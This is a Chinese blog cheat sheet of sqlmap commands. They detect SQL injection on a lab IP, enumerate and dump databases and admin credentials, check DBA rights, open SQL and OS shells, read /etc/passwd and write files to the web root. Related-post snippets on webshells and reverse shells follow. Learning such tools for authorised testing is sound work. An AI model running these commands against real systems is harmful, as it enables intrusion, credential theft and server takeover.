SqlMap篇 2021-02-01

最新推荐文章于 2024-05-14 13:06:09 发布
最新推荐文章于 2024-05-14 13:06:09 发布
阅读量283 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52612972/article/details/113523854
版权

一、Sqlmap注入篇
1、检查注入点
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11
2、爆所有数据库信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --dbs
爆当前数据库信息
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-db
3、列出指定数据库所有的表名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D fujieace --tables’fujieace’ 为指定数据库名称
4、列出指定表名的所有列名
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin --columns’admin’ 为指定表名称
5、dump打印输出表名指定列名字段的值数据
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 -D vhost48330 -T admin -C name,password --dump’name,password’ 为指定字段名称
二、Sqlmap用户权限篇
1、列出数据库管理系统用户:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --users
查看当前连接数据库用户:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --current-user
2、判断当前用户是否是DBA?
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --is-dba
3、查看用户权限:
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privilegesroot@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --privileges -U fujieace
三、Sqlmap文件操作与shell提权篇
1、sql shell
这里通过sqlmap可以直接获取一个sql shell,直接执行sql语句进行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --sql-shell
sql-shell> select version();
注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;
2、cmd shell
这里通过sqlmap可以直接获取一个cmd shell,直接执行cmd命令进行交互。
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-shellroot@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --os-cmd=ipconfig
3、读取服务器上指定文件
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=/etc/passwdroot@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-read=d:/test.txt
4、写入本地文件到服务器上
root@kali:/# sqlmap -u http://192.168.1.104/sql.php?id=11 --file-write /test/test.txt --file-dest /var/www/html/1.txt

0strive0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmapshell命令及步骤
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-12 2446
写一利用工具sqlmapshell的文章,网上已经有很多类似的文章了,感觉不是很详细,也是自己做个笔记再重温一遍sqlmapshell命令及步骤吧 sqlmap.py -u "http://192.168.3.50/2sqli-labs/Less-1/?id=1" --os-shell输入完语句之后首先会让你选择脚本类型,我这里是php的 接下来回车一下,又会出现4个选项(让你指定目录)我这个选择自定义目录,然后回车接下来输入网站的根路径会自动生成一个上传文件的地方成功写入2个shell,一个用来执行
SQLMAP怎么拿shell
weixin_43570648的博客
03-04 6493
#前言 首先,这文章只针对于渗透某单一网站,来如何利用sqlmap。如果有个别大牛是单单的挖SRC,那么手注的效率是高于sqlmap的。此外,这也是我自己的一个心得,如有不同的意见,欢迎大家进行交流学习。 此外,在开之前,我也讲讲一些加快注入的方法,比如进入一个网站,你可以看见他的语言,然后大致判断出数据库的,或者用一些网站指纹和插件来判断,这样,在注入的时候可以–dbms = mysql,这...
sqlmap 基本使用教程--个人笔记
大大大蜜蜂的博客
10-21 6493
一、sqlmap获取目标方式 1、指定目标url sqlmap -u http://www.sqllab.com/Less-5/?id=1 2、从文件中获取多个url sqlmap -m test.txt 3、从文件中加载HTTP请求 sqlmap -r url.txt 4、从burp日志中获取目标 sqlmap -l burp.txt 二、sqlmap测试命令举例: -batch: 自动答复和判断,默认输入 Y 来进行下一步操作。 -dump:拖库命令。 网站使用GET请求方式: 1、查看数据库名 sql
sqlmapshell
goddemon
06-20 2556
sqlmap5种思路拿shell总结 ①利用dump 管理员类的账户后进入进行站点后拿shell 或者拿到账户后远程连接进行连接进行udf类提取类拿shell #连接方法 sqlmap -d “mysql://admin:password@192.168.1.1:3306/security” admin是账号,psw是密码,后面是地址和端口,security数据库。我们数据库可以用current-db来查看 ②利用os-shellshell 条件①知绝对路径 ②管理员权限 ③开启 ③
最新黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)(1),2024年最新腾讯T2亲自教你
最新发布
2401_84281601的博客
05-14 1147
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
注入神器-----SqlMap的使用
weixin_54227009的博客
05-28 1352
sqlmap GET参数: -u 网址 --dbs:获取注入点的所有数据库 -D:指定数据库 --tables:获取指定的表 -T:表名 --columns:获取表的指定字段 -C:获取指定字段 --dump:把数据打印出来 POST注入: 先抓包, 注入点的位置打个*号 然后保存为txt文档 -r 指定的文档 --dbs:获取注入点的所有数据库 --level=3,注入级别默认为1,为三的话注入能力加强一点 --current-db:获取当前数据库 sqlmap获取sh...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
第二十节 Sqlmap系统参数-01
09-15
Sqlmap系统参数 Sqlmap是一个功能强大的SQL注入工具,拥有多种系统参数和选项,帮助用户实施SQL注入攻击和数据泄露。下面我们将详细介绍Sqlmap系统参数的四个方面:Sqlmap执行系统命令、Sqlmap结合Metasploit、...
第二节 Sqlmap 确定目标-01
09-15
Sqlmap 确定目标-01 Sqlmap 是一款功能强大且灵活的 SQL 注入工具,能够自动检测和利用 SQL 注入漏洞。Sqlmap 的主要功能包括直连数据库、URL 探测、文件读取目标和 Google 批量扫注入等。下面将详细介绍 Sqlmap 的...
第二十六节 Sqlmap杂项参数-01
09-15
Sqlmap 杂项参数详解 Sqlmap 是一款功能强大且广泛使用的 SQL 注入检测工具,它提供了许多实用的参数和选项,方便用户快速检测和利用 SQL 注入漏洞。下面我们将详细介绍 Sqlmap 的一些杂项参数。 1. Sqlmap 使用...
再探 Web 应用程序配置安全.doc
02-28
再探 Web 应用程序配置安全.doc
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
内网渗透模拟演练:使用sqlmap对内网mssql提权与反弹shell
zh的博客
10-24 3979
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用)
Birdman-one的博客
12-26 1万+
---------------------------------------------------------------------------------------------                        SQLMAP渗透笔记之交互写shell及命令执行(即os参数的使用) ----------------------------------
win环境下使用sqlmapshell + MYSQL提权(默认就是system权限)
weixin_30606461的博客
01-23 1009
今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
cmd echo写入shell_记一次渗透过程中用sqlmapshell
weixin_39620578的博客
12-17 361
第一步拿到注入点:http://xxxxx.com/zxxxxx.aspx?zid=16为了防止被爆菊被和谐,这里的网址采取硬核马赛克措施 – –sqlmap.py –u “http://xxxxx.com/zpDetails.aspx?zid=16” –dbs--dbs查了一下数据库估计是一个小站群,数据库不少,然后列一下数据库的管理员账号sqlmap.py –u “http://xx...
sqlmap的使用 ---- 进阶
wkend的博客
09-09 1万+
1. –level 探测等级 一共有5个等级,默认是1。 sqlmap使用的payload可以在xml\payloads中看到,也可以根据相应的格式添加自己的payload,5级包含的payload最多。 http cookie在2级时可以检测 HTTP user-Agent/Referer在3级时就会检测 2. –is-dba 当前用户是否为管理员权限 sqlmap -u "http...
sqlmap -r --dbs
09-03
对于你的问题,`sqlmap -r --dbs` 是一个用于通过 SQL 注入检测和获取数据库信息的命令。它通常用于网络安全测试中。 `-r` 参数表示使用从请求文件中获取的数据进行注入测试。`--dbs` 参数表示获取数据库的名称。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值